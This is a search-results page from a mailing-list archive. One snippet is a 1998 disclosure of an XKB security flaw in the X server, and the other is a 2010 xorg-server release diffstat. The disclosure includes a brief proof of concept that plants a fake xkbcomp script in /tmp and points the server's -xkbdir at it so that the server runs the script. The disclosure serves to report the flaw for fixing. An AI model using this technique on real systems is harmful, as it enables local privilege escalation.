Displaying 2 results from an estimated 2 matches for "ddxlist".
Did you mean:
idxlist
1998 Feb 03
0
serious security problem in XKB
...used to build the path to the compiler
$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp]
Further reading:
xc/programs/Xserver/xkb/xkbInit.c
xc/programs/Xserver/xkb/ddxLoad.c
xc/programs/Xserver/xkb/ddxList.c
--Pavel Kankovsky aka Peak [ Boycott Microsoft -- http://www.vcnet.com/bms ]
2010 Dec 07
1
[ANNOUNCE] xorg-server 1.9.99.901
...s.c | 30 +
xfixes/xfixesint.h | 13 +
xkb/XKBAlloc.c | 6 +-
xkb/XKBGAlloc.c | 30 +-
xkb/XKBMAlloc.c | 40 +-
xkb/ddxList.c | 8 +-
xkb/ddxLoad.c | 6 +-
xkb/xkb.c | 44 +-
xkb/xkbActions.c | 14 +-
xkb/xkbEvents.c | 9 -
xk...